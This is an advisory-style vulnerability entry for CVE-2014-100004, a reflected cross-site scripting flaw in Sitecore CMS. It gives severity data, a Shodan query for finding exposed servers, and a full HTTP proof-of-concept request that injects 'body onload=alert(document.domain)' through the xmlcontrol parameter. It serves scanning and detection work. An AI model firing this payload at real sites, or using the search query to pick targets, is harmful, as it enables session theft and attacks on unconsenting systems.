| Title | Sitecore CMS - Cross-Site Scripting |
|---|---|
| Author | DhiyaneshDK |
| Severity | Medium |
| Impact | Attackers can execute arbitrary JavaScript in victims' browsers, potentially stealing session cookies, credentials, or performing actions on behalf of users. |
| Remediation | Update to a patched version of Sitecore CMS or apply vendor security updates. |
| CVSS Score | 6.1 |
| EPSS Score | 0.00385 |
| CVE ID | CVE-2014-100004 |
| CWE ID | CWE-79 |
| Shodan Query | html:"Sitecore" |
| Tags | cve cve2014 xss sitecore cms vuln |
Sitecore CMS contains a cross-site scripting vulnerability via the “special way” of displaying XML Controls directly, which allows for a Cross Site Scripting Attack.
GET /?xmlcontrol=body%20onload=alert(document.domain) HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2014/CVE-2014-100004.yaml
🦈 Packet Capture: ⬇️ Download cve-2014-100004.pcap
N/AN/A